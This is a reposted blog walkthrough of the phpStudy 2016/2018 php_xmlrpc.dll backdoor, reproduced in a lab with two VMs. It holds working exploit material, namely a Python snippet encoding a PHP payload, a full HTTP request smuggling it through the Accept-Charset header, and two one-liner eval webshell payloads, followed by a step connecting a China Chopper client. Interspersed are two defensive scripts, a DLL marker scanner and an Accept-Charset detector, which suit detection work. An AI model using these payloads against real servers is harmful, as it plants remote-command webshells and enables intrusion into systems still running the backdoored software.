phpStudy Backdoor Vulnerability Reproduction

Author: sunnnnnnnnnny | Published 2020-02-05 02:06

    Vulnerability overview

    For background on the phpStudy backdoor, see https://blog.csdn.net/weixin_43886632/article/details/101294081

    phpStudy ships the backdoor in the following files

    phpStudy2016
    php\php-5.2.17\ext\php_xmlrpc.dll
    php\php-5.4.45\ext\php_xmlrpc.dll
    
    phpStudy2018
    PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
    PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
    

    Setting up the test environment

    Environment

    • VMware Workstation 14
    • Win7 web server (IP 192.168.43.196)
    • Win10 attacker (IP 192.168.43.253)
    • Burp Suite
    • phpStudy 2018

    Installing phpStudy 2018

    phpStudy 2018 installer download address
    http://downza.51speed.top/2019/01/08/phpStudySetup.rar?ssig=8b79b632ea138a93faa59871dd6d36f83784f3da&time_stamp=1580838908&fn=06542359202e44c86b60256ca293f836
    The installation process is not covered here.

    Installation successful

    After installation, visit http://192.168.43.196



    Open C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll in Notepad++ and search for eval. A match, as shown in the figure below, indicates that the backdoor is present.


    [Figure: php_xmlrpc.dll contains the backdoor]
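As an added example (not part of the original post), the Python script below automates the Notepad++ check described above: it walks the DLL paths listed in the overview beneath a phpStudy install root and reports every occurrence of the `eval` marker together with the surrounding bytes. The `make_sample_install` helper builds a constructed directory with stub files so the script runs offline; the stub contents are made up for the demonstration and are not the real DLL. A hit on `eval` alone is a coarse indicator, so confirm it against a known-good copy of php_xmlrpc.dll before declaring a file backdoored.

```python
import tempfile
from pathlib import Path

# Relative paths of the DLLs the post lists as carrying the backdoor, per phpStudy release.
BACKDOORED_DLLS = {
    "phpStudy2016": [
        r"php\php-5.2.17\ext\php_xmlrpc.dll",
        r"php\php-5.4.45\ext\php_xmlrpc.dll",
    ],
    "phpStudy2018": [
        r"PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll",
        r"PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll",
    ],
}

# The string the post searches for with Notepad++; a clean php_xmlrpc.dll should not embed it.
MARKER = b"eval"


def find_marker(data: bytes, marker: bytes = MARKER, context: int = 16):
    """Return (offset, surrounding bytes) for every occurrence of `marker` in `data`."""
    hits = []
    start = 0
    while True:
        idx = data.find(marker, start)
        if idx == -1:
            return hits
        hits.append((idx, data[max(0, idx - context): idx + len(marker) + context]))
        start = idx + 1


def scan_install(root):
    """Check every listed DLL below `root`.

    Returns {relative path: list of hits}; a missing file maps to None so that
    "not installed" is distinguishable from "present and clean" (empty list).
    """
    root = Path(root)
    report = {}
    for paths in BACKDOORED_DLLS.values():
        for rel in paths:
            # Split on the backslash so the same table works on a Linux analysis box.
            path = root.joinpath(*rel.split("\\"))
            report[rel] = find_marker(path.read_bytes()) if path.is_file() else None
    return report


def make_sample_install():
    """Build a constructed phpStudy2018-style tree for offline testing (stub files, not real DLLs)."""
    root = Path(tempfile.mkdtemp(prefix="phpstudy_sample_"))
    clean = root / "PHPTutorial" / "php" / "php-5.2.17" / "ext" / "php_xmlrpc.dll"
    bad = root / "PHPTutorial" / "php" / "php-5.4.45" / "ext" / "php_xmlrpc.dll"
    for p in (clean, bad):
        p.parent.mkdir(parents=True, exist_ok=True)
    # Constructed stubs: an MZ header followed by some text, standing in for a clean and a backdoored file.
    clean.write_bytes(b"MZ" + b"\x00" * 64 + b"xmlrpc_server_create\x00")
    bad.write_bytes(b"MZ" + b"\x00" * 64 + b"<?php @eval($_POST['x']); ?>\x00")
    return root


if __name__ == "__main__":
    sample_root = make_sample_install()
    for rel, hits in scan_install(sample_root).items():
        if hits is None:
            print(f"{rel}: not present")
        elif hits:
            print(f"{rel}: {len(hits)} '{MARKER.decode()}' hit(s), first at offset {hits[0][0]}: {hits[0][1]!r}")
        else:
            print(f"{rel}: clean")
```

Point `scan_install` at the real install root (for example `C:\phpStudy` for the 2016 layout or the directory containing `PHPTutorial` for 2018) to check a live machine; the report keeps missing and clean files apart so an absent DLL is not mistaken for a clean one.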

    Exploiting the backdoor

    Capturing the traffic with Burp Suite shows that the client can submit commands to the backend through the Accept-Charset field in the HTTP request headers.


    Executing commands

    Writing the shellcode

    import base64

    def b64encode(a):
        # Base64-encode the PHP payload so it can be carried in the Accept-Charset header
        print(base64.b64encode(a.encode('utf-8')))

    b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"<?php @eval(\$_POST['cmd']); ?>");fclose($f);""")
    # b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='
    

    Use the Burp Suite Repeater module to write the webshell; the HTTP request headers are as follows

    GET / HTTP/1.1
    Host: 192.168.43.196
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=
    Accept-Encoding: gzip,deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Length: 2
    
    

    Two one-liner webshells (一句话木马)

    atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')
    "system('echo ^<?php @eval($_POST[\"shell\"])?^>>PHPTutorial\\WWW\\shell.php');"
    atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')
    "$f =fopen(\"C:\\phpStudy\\PHPTutorial\\WWW\\x.php\",\"w\");fwrite($f,\"<?php @eval(\\$_POST['cmd']); ?>\");fclose($f);"
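As an added detection example (not from the original post), the Python code below shows how a defender would spot this traffic in a captured request or a proxy log: it pulls the Accept-Charset header, attempts a strict base64 decode, and reports which PHP or shell fragments appear in the decoded text. A genuine Accept-Charset is a comma-separated list of charset tokens, so it never decodes cleanly to PHP. The sample requests are constructed; the first reuses the header value from the Repeater request above, the second carries the `system(` one-liner from the list above, and the third is an ordinary browser value. The fragment list is my own choice, not a vendor signature set.

```python
import base64
import binascii
import re

# Fragments that should never appear in a decoded Accept-Charset value (chosen here, not a standard).
SUSPICIOUS_FRAGMENTS = ("<?php", "eval(", "system(", "fopen(", "fwrite(", "$_POST", "$_GET")

# What a genuine Accept-Charset looks like: charset tokens (or *), optional q-values, comma separated.
CHARSET_LIST = re.compile(
    r"^\s*(\*|[A-Za-z0-9._:-]+)(\s*;\s*q=[0-9.]+)?"
    r"(\s*,\s*(\*|[A-Za-z0-9._:-]+)(\s*;\s*q=[0-9.]+)?)*\s*$"
)


def extract_header(raw_request: str, name: str):
    """Return the value of the first header named `name` (case-insensitive), or None."""
    head = raw_request.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    for line in head.split("\n")[1:]:  # skip the request line
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == name.lower():
            return value.strip()
    return None


def decode_if_base64(value: str):
    """Strict base64 decode to text; None if the value is not base64 or not UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def inspect_accept_charset(raw_request: str) -> dict:
    """Classify the Accept-Charset header of one raw HTTP request."""
    value = extract_header(raw_request, "Accept-Charset")
    result = {"value": value, "charset_list": False, "decoded": None, "hits": []}
    if value is None:
        return result
    result["charset_list"] = bool(CHARSET_LIST.match(value))
    decoded = decode_if_base64(value)
    if decoded is not None:
        result["decoded"] = decoded
        result["hits"] = [f for f in SUSPICIOUS_FRAGMENTS if f in decoded]
    return result


def is_backdoor_command(raw_request: str) -> bool:
    """True when the header decodes to text containing at least one suspicious fragment."""
    return bool(inspect_accept_charset(raw_request)["hits"])


def build_request(accept_charset: str) -> str:
    """Constructed GET request carrying the given Accept-Charset header (CRLF line endings)."""
    lines = [
        "GET / HTTP/1.1",
        "Host: 192.168.43.196",
        "User-Agent: Mozilla/5.0",
        "Accept: text/html",
        f"Accept-Charset: {accept_charset}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


# Header values from the post (fopen/fwrite webshell and the system() one-liner) plus a benign value.
WEBSHELL_REQUEST = build_request(
    "JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs="
)
SYSTEM_REQUEST = build_request(
    "c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs="
)
BENIGN_REQUEST = build_request("utf-8, iso-8859-1;q=0.5, *;q=0.1")

if __name__ == "__main__":
    for label, req in [("webshell", WEBSHELL_REQUEST), ("system", SYSTEM_REQUEST), ("benign", BENIGN_REQUEST)]:
        r = inspect_accept_charset(req)
        print(f"{label}: charset_list={r['charset_list']} hits={r['hits']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Because the backdoored DLL executes the decoded header regardless of the request path, the rule keys on the header alone rather than on any URL; feeding `inspect_accept_charset` each request from a Burp or web-server capture flags the ones that matter and leaves normal browser traffic, whose header never parses as base64, untouched.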
    

    Connecting with 菜刀 (China Chopper)


    [Figure: connecting with 菜刀 (China Chopper)]
    [Figure: shell opened]


        Original link: https://www.haomeiwen.com/subject/zrqjxhtx.html